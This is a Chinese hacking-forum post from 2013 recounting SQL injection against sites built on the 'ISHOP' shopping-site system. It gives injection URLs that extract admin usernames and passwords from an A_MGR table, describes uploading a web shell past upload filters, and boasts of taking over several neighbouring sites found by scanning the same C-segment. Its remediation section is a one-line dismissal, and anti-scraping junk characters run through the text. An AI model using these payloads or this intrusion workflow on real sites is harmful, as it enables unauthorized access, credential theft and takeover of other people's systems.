中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点! W8 o. d9 D4 `  ]' K6 c# c
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389& ?1 {# V% r2 _
, o4 D" G! S  Y9 v$ a* @( ^
习惯性的加’having1=1--
) p% o( g% |+ x# c$ A) W) _
2 C4 r# c/ @3 Thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
  Z+ `, K# m+ q3 x3 h) p% y8 K$ ~8 z8 h- ?2 l! `) p
0
: i$ X. s3 l* N  _4 Z( v& I
0 O* {0 W) l% L; u; I, b" x$ h爆出Diary_A.dl_Title(这时候很激动啊)
. ]. \2 n' G; ^/ F) ?5 ]: V
2 w% f. s' I% s* e& r0 _4 t0 G7 j那么继续
6 }/ Z$ r; N& zhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
' d# @' A0 n1 S+ |: @! s5 L2 E# I. {; u- P& A
继续,一直爆下去
) C( q0 e: L; ?3 E$ h6 k
4 }3 f% f: d$ ~8 |爆到几个字段和表段 但是没找到需要的管理用户的字段
5 r- a0 p/ u* f4 D6 z: X- O; ~- P4 e. l: m5 ?1 D
蛋疼了 怎么办 然后去后台登陆页看源码. c, l/ ]8 ^5 E' h

. I# h8 D& z& m1 B1 n2 H0+ d' O$ S6 F& V; E0 @# @/ u) D& t

% i+ b' k$ ~6 A4 R0 c; gInput name= “ADUID”) N" n- b9 d9 s3 a
Input name= “ADPWD”! t7 T1 l: T* D: T' Z/ p

% Q& Y/ B$ X1 {/ ]$ _6 d  a很幸运 找到了字段那就继续& ]7 Y% ]& s' T& e
找到之后开始爆用户
; W$ y) U" m& O$ d7 j! E6 Y( Dhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—: @- y! s- r0 x% [. ~
爆密码
; n8 I' `. h1 p1 ], R/ ]http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—* q0 n/ ~% v' D/ ~
测试了下 这个注入点只能爆到文章哪里的表 + {9 o& V7 v0 R- [$ t9 Y3 f
; r2 D/ k0 E$ e; W
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了5 F3 ?: k+ p( S* v" X1 U

1 O4 Q) L) }4 q+ q2 G. f又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
( r8 q3 Z- H0 i
; e' Q: h" I" B1 Y6 v473) X; ^6 K, F$ s7 Z+ V& I, s. X$ Q4 f, u

$ D  R8 n% G' z2 D: Q进后台0 Q1 J+ q. Y8 B6 X/ E/ s
& n) u! C6 e) N$ i3 Z9 ]
, `1 [. ^2 ]3 m& O+ x6 O, k6 Z% }! m
发现几个上传点 有的地方不能上传 而且防止恶意代码
% `  O3 b0 x; T0 T2 y6 p1 L" e  q. \+ R; `+ C: q) q* C7 w
没办法 各种百度各种找大牛 找到一只好像可以突破的马
1 }; ^# J( D' h: l$ X; g% e% Y5 [* h* l% k2 ^& ^- {% p
; _7 q8 Q: R, p7 x# N
在系统管理那里直接上传 不过没有显示地址# y" W, ?3 z/ v" I' b) c9 Y

" k/ E/ {0 E3 P再上传一次 抓包 搞定OK
& I4 w+ I0 I' {( F
0 I% w# [, ?% Z9 y& R9 p
1 U9 Z1 H& {: R4 b3 r  |7 d/ C( h! {8 [) {  g: e7 b
472
- Y; E; d6 G1 A3 M  k1 G
2 k/ I  q5 V# v8 t" o  {晚上不行了 去睡觉。。。* f& q. j: ]3 _! p3 \
第二天刚起床 闲的没事做继续日站吧
/ q+ i/ Y5 K: t& z0 Z% t# ^8 _' @9 p7 L+ t7 R4 C; k8 M
找个站 就把这个站的旁c扫了下
0 y. R  C! R. g4 J) v
$ Y# Z( @7 F+ i) l' _0 x" H3 C发现c段也有一个购物站 ,然后还和这个站的模板差不多
0 [  S: u( J5 Y; P9 f9 U! y8 ^1 R3 h: c
就找到会员登录口测试0 K1 Y. P0 g" a9 u* t
( [* A% C) w0 V
'and (select top 1 MGR_UID from A_MGR)>0—
) C  i* ?/ |) M- S/ I1 d: G" }果断爆到了 这时候我很激动 通杀
, z/ B$ ]; x, G7 j5 C+ W' ~. u3 \- h  G
再次翻c段1 y' I1 m( q- X4 k6 b9 q. h
9 @; w- \* }& I- {4 M% }- @9 i
翻出几个站 都成功拿下* e) h" K- ^* K! u! `
/ g( _  k& ?! _, k+ T
1 S& [1 Q' Y& Z# e$ t1 `* C% F. ]# f
* z4 }5 G7 g) V! s
修复方案:$ `- t7 V$ U: z
他们比我专业 % I/ I- c& }. J- \# a; ^6 ^

  i1 ]: G+ g% S+ x: F- Y& g3 S/ G( d+ Z# F- u
/ i; g0 [% q2 K9 j




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2